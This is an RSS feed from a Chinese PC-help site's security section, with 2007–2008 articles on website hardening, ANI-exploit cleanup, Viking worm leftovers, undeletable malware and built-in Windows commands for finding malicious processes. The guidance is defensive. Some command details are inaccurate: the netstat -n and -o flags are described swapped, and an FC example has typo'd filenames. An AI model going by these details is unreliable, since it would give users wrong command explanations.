<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="inc/rss.xsl" version="1.0"?><rss version="2.0">
<channel>
<title>安全防黑 - 星辰电脑网络技术网 - 计算机服务网络信息中心(CSNIC)</title>
<link><![CDATA[http://csnic.net/]]></link>
<description><![CDATA[星辰电脑网络技术资讯网-计算机服务网络信息中心(CSNIC),力争打造最具专业的电脑网络技术服务品牌；我们的口号是：为中国计算机服务提供动力!]]></description>
<language>zh-CN</language><generator>iwms.net</generator>
<image>
<title><![CDATA[星辰电脑网络技术网 - 计算机服务网络信息中心(CSNIC)]]></title>
<url>pic/logo.gif</url>
<link>http://csnic.net/</link>
</image>
<item>
	<title><![CDATA[网站站长必读：十点技巧保障您的网站安全]]></title>
	<link><![CDATA[http://www.csnic.net:81/n1118c37.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Mon, 24 Mar 2008 02:03:03 GMT</pubDate>
	<category><![CDATA[黑客攻防]]></category>	<description><![CDATA[<P><SPAN id=zoom>　　香港娱乐圈“艳照门”事件沸沸扬扬，究其原因无关道德，实在是电脑不安全，照片和录象被泄密了。</SPAN> 
<P><SPAN id=zoom>　　只要掌握了信息安全技术，才不会担心你的信息的丢失，不担心你上网会被盗窃银行密码和QQ密码邮箱密码，我们才不会出现陈冠希一样的尴尬。 </SPAN>
<P><SPAN id=zoom>　　春节前后，网上炒的最沸腾的就是“艳照门”了，这在信息安全这个小小的圈子里也一个不大不小的热点。一时间众说纷纭，社交工程、信息销毁、道德法律等字眼都进入眼帘。 </SPAN>
<P><SPAN id=zoom>　　我就想不到那么复杂的东东，我觉得就是两个小的细节没有做好。 </SPAN>
<P><SPAN id=zoom>　　1.送修前没有将硬盘卸除或者彻底销毁关键数据：由于种种的不方便，似乎很少人这么做。 </SPAN>
<P><SPAN id=zoom>　　2.没有在维修时进行全程维修陪同监控：由于没有这方面的意识，似乎很少人这么做。 </SPAN>
<P><SPAN id=zoom>　　如果这两个小动作做了，那么就可以避免此次安全事件的发生。 </SPAN>
<P><SPAN id=zoom>　　对于网站的站长来说，安全应该怎么做呢？ </SPAN>
<P><SPAN id=zoom>　　目前很多人都采用动网、LEADBBS、动易系统等程序做网站，由于源码公开，因此程序漏洞暴露明显，很容易被黑，安全专家陈十三哥建议大家参考以下部分安全建议，做好自身安全： </SPAN>
<P><SPAN id=zoom>　　(1)仔细查看安装说明，切记修改默认数据库名，并且一定要把扩展名改为asp或者asa，因为不经处理的数据库可以直接下载，根本无安全可言，另外可以把数据库所在目录改名。 </SPAN>
<P><SPAN id=zoom>　　(2)尽量不采用无组件上传，使用其他组件上传方式（比如Fileup或LyfUpload），部分无组件上传带有严重漏洞，一般可通过修改upfile.asp文件选择上传方式。 </SPAN>
<P><SPAN id=zoom>　　(3)经常访问相关官方网站，关注程序安全漏洞和更新版本，及时给自己程序升级或打上补丁。 </SPAN>
<P><SPAN id=zoom>　　(4)尽量不采用修改版和插件版的程序，因为修改后的程序会使漏洞更多，而且补丁也不一定完全适用。 </SPAN>
<P><SPAN id=zoom>　　(5)设置相对复杂的FTP密码和网站管理密码并经常修改，同时考虑修改网站后台管理的文件名称。 </SPAN>
<P><SPAN id=zoom>　　(6)经常检查网站内文件，发现可疑文件后及时处理，并分析可能的原因。 </SPAN>
<P><SPAN id=zoom>　　(7)对于SQL数据库，您可以用企业管理器连接，然后把重要数据表设置为只读权限，如动网的DV_Admin表修改为只读以后，可以防止任何方式添加管理员。 </SPAN>
<P><SPAN id=zoom>　　(8)二次开发时切记做好对特殊符号的过虑，防止注入漏洞。 </SPAN>
<P><SPAN id=zoom>　　(9)经常备份自己的网站数据，因为网站安全的第一要求就是备份，防止被黑以后数据丢失。 </SPAN>
<P><SPAN id=zoom>　　(10)如果有服务器管理权限建议把论坛上传图片目录设置权限最低。 </SPAN>
<P><SPAN id=zoom>　　在网络攻击成倍增长的今天，网络反黑客保安全已经成为每个计算机用户的必备课程。欲成为成功的信息安全专业人士，不仅需要不断更新最尖端的安全知识，还需要对商务过程和风险管理有深刻认识。就现在许多IT公司的现状来看，基本上每一个公司都有一名或多名（部门）专职的人员负责着公司内网、外网、服务器的网络安全维护。而随着网络应用的不断普及与信息安全服务需求市场的不断成熟，逐渐出现了一些专业的以信息安全服务为主要业务的团队、公司。 </SPAN>
<P><SPAN id=zoom>　　大多数公司的网管仅仅是程序人员和网页设计人员，对安全涉猎有限。而且，网络是否安全，有时并不是网络所有者自己完全清楚的。所以，许多公司要请第三方评估机构或专家来完成对网络安全的评估。这样做的好处是：能对自己所处的环境有个更加清醒的认识，把未来可能的风险降到最小。目前网络安全评估的中介机构，国外已经开始将网络的安全评估作为一个新的服务项目向社会推出。作为一种新兴的业务，其影响是否能象会计师事务所、审计师事务所之类的中介机构那样重要，尚需拭目以待。但有一点可以肯定，那就是网络上的商机同样也与风险同存。要想获得利润，就必须将安全问题解决。</SPAN></P>]]></description>
</item>
<item>
	<title><![CDATA[删除U盘免疫器创建的 autorun.inf文件夹]]></title>
	<link><![CDATA[http://www.csnic.net:81/n943c38.aspx]]></link>
	<author><![CDATA[csnic]]></author>	<pubDate>Tue, 13 Nov 2007 07:37:25 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<BR><A href="http://www.csnic.net:81/upload/2007_11/07111315385284.rar" target=_blank>下载删除U盘免疫器创建的 autorun.inf文件夹批处理文件</A>]]></description>
</item>
<item>
	<title><![CDATA[开机不显示桌面的应急处理方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n939c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Thu, 01 Nov 2007 02:31:33 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<FONT color=#0000ff>此问题是最近大量出现的，利用Windows ANI鼠标指针漏洞的木马、病毒、恶意程序所致</FONT>。<BR>因为ANI漏洞在2000、XP、2003、Vista操作系统中都存在，而且现在已经出现了大量利用此漏洞传播的<BR>木马、病毒、恶意程序，所以最终受其危害影响的范围极为广泛。 
<P>【问题分析】<BR>由于是利用操作系统自身的漏洞，现有的绝大多数反病毒软件、防漏洞软件、主动防御软件无法阻止、清除<BR>这些利用漏洞的木马、病毒、恶意程序。要彻底解决此问题，只能安装微软公司针对此系统漏洞的补丁，并用<BR>安全软件(推荐360安全卫士)彻底清理木马、病毒、恶意程序。</P>
<P>【处理步骤】<BR><BR><B><FONT color=#0000ff>一、重置Explorer.exe，让Windows桌面图标恢复正常</FONT></B><BR>★如果系统启动后可以正常显示桌面图标，可以跳过此步骤。</P>
<P>1、同时按下键盘上的『Ctrl』、『Alt』和『Delete』键呼出任务管理器。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548621.jpg"></P>
<P>2、切换到『进程』标签页，右键点击其中的explorer.exe这项，在弹出菜单中点『结束进程』。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548622.jpg"></P>
<P>出现如下图所示的提示时，点击『是』确认结束进程。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548623.jpg"></P>
<P>3、在任务管理器左上角的文件菜单中点开『新建任务』，在弹出窗口中输入"explorer"并『确定』即可。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548624.jpg"></P>
<P><B><FONT color=#0000ff>二、下载最新版本的360安全卫士清理系统</FONT></B></P>
<P>1、请从下面的网址下载360安全卫士并安装。<BR>360安全卫士官方下载地址(直接点击即可开始下载)：<BR><A href="http://dl.360safe.com/setup.exe" target=_blank><U><FONT color=#0000ff>http://dl.360safe.com/setup.exe</FONT></U></A> 或 <A href="http://220.181.34.241/setup.exe" target=_blank><U><FONT color=#0000ff>http://220.181.34.241/setup.exe</FONT></U></A></P>
<P>2、运行360安全卫士，扫描系统中的恶意软件。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548625.jpg"></P>
<P>★扫描木马程序的过程可能需要几分钟左右的时间，请耐心等待。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548627.jpg"></P>
<P>3、把扫描出的结果全部选中后，点击『立即清除』。<BR>★如果清除时提示需要重启计算机，先不要重启。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548626.jpg"></P>
<P><B><FONT color=#0000ff>三、安装微软发布的针对ANI漏洞的安全补丁(KB925902)</FONT></B></P>
<P>1、点到360安全卫士主菜单『修复』页面，点开『修复系统漏洞』标签。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548628.jpg"></P>
<P>2、选上里面的MS07-017 KB925902这项，点击『下载并修复』来下载并安装补丁。<BR>★如果在系统漏洞列表中看不到MS07-17 KB925902这项，则说明系统已经安装过补丁了。<BR><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/071101103548629.jpg"></P>
<P>3、安装完补丁之后，重启计算机即可。</P>
<P>PS:除了上述方法，也可以直接从下面提供的链接直接下载安装所需的补丁，并在安装后重启计算机。<BR>Windows XP: <A href="http://download.microsoft.com/download/5/8/3/58324bce-00c5-42b7-bd05-1353c0604dab/WindowsXP-KB925902-x86-CHS.exe" target=_blank><U><FONT color=#0000ff>点此下载</FONT></U></A><BR>Windows Vista: <A href="http://download.microsoft.com/download/0/4/7/0472557e-05f2-471e-a018-3286d63c51c3/Windows6.0-KB925902-x86.msu" target=_blank><U><FONT color=#0000ff>点此下载</FONT></U></A><BR>Windows 2000: <A href="http://download.microsoft.com/download/d/4/d/d4d5b707-58a9-4fbc-ab58-e20cc86db7bb/Windows2000-KB925902-x86-CHS.EXE" target=_blank><U><FONT color=#0000ff>点此下载</FONT></U></A><BR>Windows 2003 Server: <A href="http://download.microsoft.com/download/d/8/f/d8fc1f92-a8a3-490a-b8c1-70258436e37f/WindowsServer2003-KB925902-x86-CHS.exe" target=_blank><U><FONT color=#0000ff>点此下载</FONT></U></A></P>
<P><B><FONT color=#0000ff>四、重启计算机后再次运行360安全卫士扫描系统检查是否已经清理干净</FONT></B></P>
<P><IMG onclick=javascript:window.open(this.src); alt=图片点击可在新窗口打开查看 src="http://www.csnic.net:81/upload/2007_11/0711011035486210.jpg"><BR>如果扫描之后提示没有发现恶意软件，说明已经成功修补了漏洞并成功清理了问题文件。<BR><FONT color=#ff0000>如果扫描之后发现还有恶意软件，请重复前面的操作再次清理直到360扫描不到问题软件为止。<BR><BR>全文转自网络<BR></FONT><FONT color=#000000>实际上说的是：启动后结束</FONT><FONT color=#000000>explorer.exe进程，再运行explorer任务，打开桌面后再杀毒</FONT></P>]]></description>
</item>
<item>
	<title><![CDATA[硬盘双击无反应,但用右键菜单“打开”可以访问其他一切正常,怎么办?]]></title>
	<link><![CDATA[http://www.csnic.net:81/n572c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:38:36 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[1&nbsp;控制面板--文件夹选项--查看--去除隐藏受保护的操作系统文件,搜索，如果各分区根目录下带autorun.inf一类的隐藏文件，将它删除，重新启动电脑&nbsp; <BR>2&nbsp;在文件类型中重新设置打开方式（以XP为例）&nbsp; <BR>打开我的电脑&nbsp;工具&nbsp;文件夹选项&nbsp;文件类型&nbsp;找到“驱动器”，点下方的“高级”&nbsp;点选“编辑文件类型”里的“新建”&nbsp;操作里填写“open”，&nbsp;用于执行操作的应用程序里填写explorer.exe&nbsp;确定&nbsp; <BR>随后返回到“编辑文件类型”窗口，选中open&nbsp;设为默认值&nbsp;确定&nbsp;现在再打开分区或文件夹看下，是不是已恢复正常？&nbsp; <BR>3&nbsp;、开始&nbsp;运行&nbsp;输入regedit&nbsp;找到［HKEY_CLASSES_ROOT\Directory\shell］将shell下的全部删除&nbsp;然后关闭注册表&nbsp;按键盘F5刷新&nbsp; <BR><BR>试试将HKEY_CLASSES_ROOT\directory\shell和HKEY_CLASSES_ROOT\drive\shell的默认值由"open"改为"none",这是系统默认的．&nbsp; <BR><BR>不行的话：打开注册表找到HKEY_CLASSES_ROOT\&nbsp;directory&nbsp;,删掉shell项;另找到HKEY_CLASSES_ROOT\drive,同样删掉shell项即可.保险起见,请先备份．]]></description>
</item>
<item>
	<title><![CDATA[走出误区 教你如何选择适合的杀毒软件]]></title>
	<link><![CDATA[http://www.csnic.net:81/n571c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:37:41 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P><FONT face=Verdana>对于普通用户来说，选一款适合自己的杀毒软件需要从下面三个方面来考虑： </FONT></P><BR>
<P><FONT face=Verdana>1、本地化程度（包括官方汉化、中文系统整合程度、本地病毒查杀能力）； </FONT></P><BR>
<P><FONT face=Verdana>2、病毒库（包括大小和更新速度）； <BR>3、对非病毒库病毒灵敏度（也就是所谓启发式杀毒）； </FONT></P><BR>
<P><FONT face=Verdana>同时，由于网上对各个杀毒软件评价不一，很多人人云亦云，所以带来很多误区，也值得注意。 </FONT></P><BR>
<P><FONT face=Verdana>误区一：国产杀毒软件完全没有作用。 </FONT></P><BR>
<P><FONT face=Verdana>应该说国产很多杀毒软件和国外软件相比技术上有差距，不过也不能说太大，有些国产杀毒采用的就是国外杀毒软件的引擎，有些自己的引擎还有很多技术优势。比如瑞星的启发式杀毒能力在最近一次国外评测中是第五位，很值得骄傲。同时国产软件对本地病毒的发现和反应也要速度更快些。 </FONT></P><BR>
<P><FONT face=Verdana>不过，国产杀毒软件的缺点也很明显，最主要的就是病毒库不够大，对国外的病毒反应慢，容易漏杀。比如瑞星的病毒库在评测中排到了20名以后，金山和江民没看见影子。 </FONT></P><BR>
<P><FONT face=Verdana>另外和系统的整合上，虽然是中文本地化，但是有技术实力问题，占用资源较大。 </FONT></P><BR>
<P><FONT face=Verdana>误区二：世界第一的就是最好的。 </FONT></P><BR>
<P><FONT face=Verdana>要知道国外病毒软件评测是不断进行的，而且一般是病毒库评测，也就是看你能杀多少病毒，最多的就是第一。 </FONT></P><BR>
<P><FONT face=Verdana>比如bitdefender 这款罗马利亚的病毒软件06年上半年排名第一，超过了卡巴斯基。而最近一次评测中卡巴又排名第一，bd到了第3。 </FONT></P><BR>
<P><FONT face=Verdana>所以第一不是恒定的，一般世界前几位的杀毒软件能力各有千秋，不相上下，不过就是病毒库大小差别而以。而评测采用的病毒库把很多二进制病毒和不会发作的病毒木马也采用在内，也包括一些注册机，所以不能说病毒库小一些就一定杀毒能力差一些。 </FONT></P><BR>
<P><FONT face=Verdana>误区三：对杀毒软件评价偏听人言，不以实践为依据： </FONT></P><BR>
<P><FONT face=Verdana>最典型的几个例子，比如说卡巴斯基=卡吧死机，实际上现在的主流机器装卡巴一般不会出现卡的情况，有些机器卡主要出现的软件冲突上，比如安装多个杀毒软件等。 </FONT></P><BR>
<P><FONT face=Verdana>另外一个例子是NOD32最常见的评价是很难在线更新，其实NOD32在线更新很流畅，完全没有问题。 </FONT></P><BR>
<P><FONT face=Verdana>走出这些误区，还是要以实践为标准，那么我们具体可以采用那些杀毒软件了？我使用过大部分常用的杀毒软件，推荐几款给大家： </FONT></P><BR>
<P><FONT face=Verdana>1、 国产软件 </FONT></P><BR>
<P><FONT face=Verdana>国产软件推荐瑞星，启发式杀毒能力世界前5，对付本地病毒反应迅速，占用资源也不大。 </FONT></P><BR>
<P><FONT face=Verdana>缺点是病毒库太小，对付国外流行病毒有可能漏杀漏报。 </FONT></P><BR>
<P><FONT face=Verdana>2、 国外软件 </FONT></P><BR>
<P><FONT face=Verdana>主要看是否本地化。这样排名前几位的bitdefender、F-Secure就得往后靠了。 </FONT></P><BR>
<P><FONT face=Verdana>推荐卡巴斯基，病毒库排名世界第一，更新速度最快，本地化程度高，有专门中国区病毒收集库。最新的卡巴斯基6带有主动防御，类似系统防火墙，可以拦截大多数对系统低层的操作，提交用户判断，可谓安全到极致。 </FONT></P><BR>
<P><FONT face=Verdana>缺点，卡巴最大的缺点是对自身防御不足（笑…………）。由于名声太大，枪打出头鸟，大多数流行病毒都想办法对付卡巴斯基。比如最近大名鼎鼎的“落雪”，如果你机子已经中了落雪，那么卡巴斯基会被它轻松干掉。所以还是要卡巴斯基6加入主动防御是很有必要的，用好了大多数病毒和木马都不可能植入系统。&nbsp; </FONT></P><BR>
<P><FONT face=Verdana>另外卡巴斯基有时候会莫名其妙的程序分离，需要重新运行，或者病毒库被破坏，需要恢复后才能更新。 </FONT></P><BR>
<P><FONT face=Verdana>总之，卡巴是普通用户的首选，如果你用安全套装，连防火墙都带了，而且很不错，一套软件就能满足大部分防御需求。 </FONT></P><BR>
<P><FONT face=Verdana>其他的杀毒软件，推荐Nod32和McAfee。 </FONT></P><BR>
<P><FONT face=Verdana>NOD32与系统整合紧密，非常稳定，而且启发式杀毒世界第一，病毒库也是世界前5的。对于很多用户来说，频繁的跳出杀毒警报的杀毒软件就是好的（期望病毒上身……？）。那种一声不吭的，往往心里发毛……会不会是他漏报了？ </FONT></P><BR>
<P><FONT face=Verdana>呵呵，开个玩笑。其实nod32会把一部分注册机当病毒，不过毕竟我们要的是最安全，稍微过一点也是安全的保障。 </FONT></P><BR>
<P><FONT face=Verdana>nod32的缺点是太敏感，会误杀注册机一类的，另外病毒库是1天更新一次，当然不如卡巴的1小时更新迅速。 </FONT></P><BR>
<P><FONT face=Verdana>McAfee，用的时间不长。中文化，并且界面友好，有多种防御方法，可以定制规则。 </FONT></P><BR>
<P><FONT face=Verdana>虽然它的病毒库最新评测是13，启发式杀毒是20，不过他本身可以制定详细的规则，可以抵御大部分病毒入侵，所以电脑知识熟悉的用户用它是没错的。 </FONT></P><BR>
<P><FONT face=Verdana>最后，没有本地化的几款杀毒软件，比如bitdefender、F-Secure还有Dr. Web，都是很强的杀毒软件，其中 bitdefender和F-Secure病毒库都是前3，bd有强大的主动防御能力，fs则集成4个杀毒引擎，Dr. Web则号称最强大的启发式（号称……），据说她从来不关心病毒库评测，认为这都是假的…… </FONT></P><BR>
<P><FONT face=Verdana>这些可说各有优势，不过就我用的情况来看，都和中文系统整合有问题，比如bd在多用户环境下杀毒等级会下降，而且太敏感，很多时候你右键点压缩包半天不出来菜单，是因为bd在抢先查毒，很浪费时间。而fs则有太多进程，有时候会系统崩溃…………。 </FONT></P><BR>
<P><FONT face=Verdana>总结，无论你用什么杀毒软件，配合防火墙和杀木马软件，并且勤更新，才能最大限度的抵御病毒。 <BR>原帖来自于网易社区:http://club.163.com/viewArticleByWWW.m?boardId=itforum&amp;articleId=itforum_112666f603a76a5_0&nbsp;</FONT></P>]]></description>
</item>
<item>
	<title><![CDATA[经验共享 遭遇无法删除病毒的处理方法]]></title>
	<link><![CDATA[http://www.csnic.net:81/n570c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:36:40 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[随着不限时宽带的普及，为了方便BT下载，很多朋友都爱24小时挂机。全天候的在线，这给一些病毒、木马“入侵”系统带来了极大便利，他们可以在半夜入侵我们的电脑，肆意为非作歹。近日笔者在帮助一位朋友杀毒的时候，就遭遇一个“无法删除的病毒”，下面将查杀经验与大家共享。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 1.惊现病毒。朋友的电脑安装的是Windows XP专业版，近来常常彻夜开机用BT下载电影，没想到在一次开机的时候，Norton就报告在下发现病毒“exporer.exe”，不过使用Norton扫描后，虽然可以发现病毒，但Norton提示无法隔离和删除病毒文件。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 2.查杀。一般来说，病毒如果无法被直接删除，大多是由于病毒进程在运行导致的，打开任务管理器，找到病毒进程“exporer.exe”顺利将其终止，按照Norton提供病毒文件路径，找到病毒文件后，按住Shift键右击选择“删除”，奇怪的是系统却提示无法删除文件，再次打开任务管理器，我已经确信病毒进程被终止了，而且也不是在写保护状态，为什么无法删除?我试图把文件夹删除，但同样遭到系统拒绝，重启电脑多次仍然是同样的结果。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 后来笔者在查看“exporer.exe”属性(看看文件生成日期和大小，以便搜索一下病毒还有没有同伙)时，意外发现属性窗口还有一个“安全”标签，点击后可以看到在用户权限列表“特别权限”的拒绝选项被打上小勾，会不会是文件权限不够导致无法删除?单击的“高级”按钮，在弹出的窗口我看到一个“拒绝删除”的权限，单击“编辑”终于看到文件无法删除的真正原因了，原来当前用户的删除权限被施毒者设置为拒绝了，但是却允许“读取和运行，取消拒绝的权限后，返回文件属性窗口，勾选”允许完全控制“，单击”确定“退出后顺利删除”exporer.exe“。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 小提示<BR><BR>&nbsp;&nbsp;&nbsp;&nbsp; 文件(夹)属性“安全”标签只会在NTFS格式的分区出现，如果看不到此标签，打开我的电脑，单击“工具→文件夹选项→查看”，然后在高级设置选项下去除“简单文件共享(推荐)”前的小勾。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 笔者在删除“exporer.exe” 后试图删除文件夹，遭到系统拒绝后，通过查看文件夹的“安全”属性，同样可以发现删除权限(删除子文件夹及文件、删除)被拒绝了，同上，取消这个限制后顺利把病毒“扫地出门”。对于文件(夹)，如果是由于权限原因被拒绝操作，一般将权限设置为“完全控制”即可。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; 小技巧<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; (1)权限是可以继承的，有时候打开某个文件安全属性标签后，可能在图4不会有“拒绝删除”权限，但是如果它的父文件夹设置了“拒绝删除子文件夹及文件”，该文件还是无法被删除的，解决方法是将文件权限设置为完全控制。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; (2)文件权限是和文件所有者相关联的，对于办公室多帐户电脑，一些别有用心的人可能还会将木马和用户对应起来(以针对电脑操作水平较低帐户，警惕性不高易于窃取资料)，如果发现木马毒会和对应帐户关联，即有些用户登录后木马会运行，而有些则不会(木马文件权限被设置为禁止读取和删除)，这时可以用系统管理员身份登录，强行将木马文件所有者更改为当前用户，然后设置为完全控制将木马删除。<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<BR>&nbsp;&nbsp;&nbsp;&nbsp; (3)一点经验。Windows XP/2000的文件(夹)权限，是系统一项特殊功能，它允许灵活设置不同用户的不同权限，一些牧马者通过将病毒程序文件设置为允许“读取和运行”、拒绝“删除”，从而实现更好的“自我保护”。由于更改文件权限操作比较复杂，施毒者一般要在宿主机上亲自操作，对于喜爱全天候挂机的朋友，安装一款防护能力较好的防火墙，关闭一些不必要端口，可以有效防止此类病毒的袭击，如果发现病毒无法删除，在终止进程情况下，大家一定要看看文件权限是否被更改了]]></description>
</item>
<item>
	<title><![CDATA[_desktop.ini是什么]]></title>
	<link><![CDATA[http://www.csnic.net:81/n569c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:34:15 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<DIV>_desktop.ini是什么</DIV>
<DIV>那是中了威金病毒的最新变种，我这里查到的病毒名是：worm.viking.bb，用国内杀毒软件根本无法查到，这个病毒就感染电脑所有的EXE文件，每个感染的目录都生成一个隐藏的“_desktop”文件，同时在windows目录生成logo1_.exe、dll.dll、rundl132.exe三个文件，而且每次重新启动后感染数量会不断增加，就算用ghost恢复系统也没用，很快就会从其他盘感染回来的，除非是格式化全部硬盘。我尝试了很多杀毒软件对新变种的病毒都无法查杀，最后我是用卡巴斯基6.0版本把病毒库升到最新版本在安全模式下面才能完全查杀。杀完毒后有的需手工清理_desktop.ini.<BR>那么多的_desktop.ini该怎么清理呢？下面给出两个清理方法:<BR><STRONG>方法一:</STRONG><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;点开始菜单，然后选运行，输入cmd回车，会出现一个命令提示符窗口，在里面输入如下命令<BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;del&nbsp;d:\_desktop.ini&nbsp;/f/s/q/a&nbsp;<BR>　　强制删除d盘下所有目录内（包括d盘本身）的_desktop.ini文件并且不提示是否删除，如果你想删除c盘的_desktop.ini文件，把上面命令改为del&nbsp;c:\_desktop.ini&nbsp;/f/s/q/a即可，以此类推<BR>　　/f&nbsp;强制删除只读文件&nbsp;<BR>　　/q&nbsp;指定静音状态。不提示您确认删除。&nbsp;<BR>　　/s&nbsp;从当前目录及其所有子目录中删除指定文件。显示正在被删除的文件名。&nbsp;<BR>　　/a的意思是按照属性来删除了<BR><BR><STRONG>方法二:</STRONG><BR>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;用windows的搜索功能搜索所有盘符的_desktop.ini文件，搜索完后把所有_desktop.ini文件删除即可。</DIV>]]></description>
</item>
<item>
	<title><![CDATA[利用系统自带命令查杀病毒]]></title>
	<link><![CDATA[http://www.csnic.net:81/n568c38.aspx]]></link>
	<author><![CDATA[]]></author>	<pubDate>Wed, 05 Sep 2007 07:32:07 GMT</pubDate>
	<category><![CDATA[杀毒技术]]></category>	<description><![CDATA[<P>　　上网最恐怖的事莫过于新病毒出来的时候，尽管电脑上我们都装有各种强大的杀毒软件，也配置了定时自动更新病毒库，但病毒总是要先于病毒库的更新的，所以中招的每次都不会是少数，这里列举一些通用的杀毒方法，自己亲自动手来用系统自带的工具绞杀病毒：</P>
<P>　　一、自己动手前，切记有备无患——用TaskList备份系统进程</P>
<P>　　新型病毒都学会了用进程来隐藏自己，所以我们最好在系统正常的时候，备份一下电脑的进程列表，当然最好在刚进入Windows时不要运行任何程序的情况下备份，样以后感觉电脑异常的时候可以通过比较进程列表，找出可能是病毒的进程。</P>
<P>　　在命令提示符下输入：</P>
<P>　　TaskList /fo:csv&gt;g:zc.csv</P>
<P>　　上述命令的作用是将当前进程列表以csv格式输出到“zc.csv”文件中，g:为你要保存到的盘，可以用Excel打开该文件.</P>
<P>　　二、自己动手时，必须火眼金睛——用FC比较进程列表文件 如果感觉电脑异常，或者知道最近有流行病毒，那么就有必要检查一下。</P>
<P>　　进入命令提示符下，输入下列命令：</P>
<P>　　TaskList /fo:csv&gt;g:yc.csv</P>
<P>　　生成一个当前进程的yc.csv文件列表，然后输入：</P>
<P>　　FC g:\zccsv g:\yc.csy</P>
<P>　　回车后就可以看到前后列表文件的不同了，通过比较发现，电脑多了一个名为“Winion0n.exe”(这里以这个进程为例)不是“Winionon.exe”的异常进程。</P>
<P>　　三、进行判断时，切记证据确凿——用Netstat查看开放端口 对这样的可疑进程，如何判断它是否是病毒呢？根据大部分病毒（特别是木马）会通过端口进行对外连接来传播病毒，可以查看一下端口占有情况。</P>
<P>　　在命令提示符下输入：</P>
<P>　　Netstat -a-n-o</P>
<P>　　参数含义如下：</P>
<P>　　a:显示所有与该主机建立连接的端口信息</P>
<P>　　n:显示打开端口进程PID代码</P>
<P>　　o：以数字格式显示地址和端口信息</P>
<P>　　回车后就可以看到所有开放端口和外部连接进程，这里一个PID为1756（以此为例）的进程最为可疑，它的状态是“ESTABLISHED”，通过任务管理器可以知道这个进程就是“Winion0n.exe”，通过查看本机运行网络程序，可以判断这是一个非法连接！</P>
<P>　　连接参数含义如下：</P>
<P>　　LISTENINC：表示处于侦听状态，就是说该端口是开放的，等待连接，但还没有被连接，只有TCP协议的服务端口才能处于LISTENINC状态。</P>
<P>　　ESTABLISHED的意思是建立连接。表示两台机器正在通信。TIME-WAIT意思是结束了这次连接。说明端口曾经有过访问，但访问结束了，用于判断是否有外部电脑连接到本机。</P>
<P></P>
<P>　　四：下手杀毒时，一定要心狠手辣——用NTSD终止进程</P>
<P>　　虽然知道 “Winion0n.exe”是个非法进程，但是很多病毒的进程无法通过任务管理器终止，怎么办？</P>
<P>　　在命令提示符下输入下列命令：</P>
<P>　　ntsd –c q-p 1756</P>
<P>　　回车后可以顺利结束病毒进程。</P>
<P>　　提示：“1756”为进程PID值，如果不知道进程的ID，打开任务管理器，单击“查看→选择列→勾上PID（进程标识符）即可。NTSD可以强行终止除Sytem,SMSS.EXE,CSRSS.EXE外的所有进程。</P>
<P>　　五、断定病毒后，定要斩草除根——搜出病毒原文件 对于已经判断是病毒文件的“Winion0n.exe”文件，通过搜索“本地所有分区”、“搜索系统文件夹和隐藏的文件和文件夹”，找到该文件的藏身之所，将它删除。不过这样删除的只是病毒主文件，通过查看它的属性，依据它的文件创建日期、大小再次进行搜索，找出它的同伙并删除。如果你不确定还有那些文件是它的亲戚，通过网络搜索查找病毒信息获得帮助。</P>
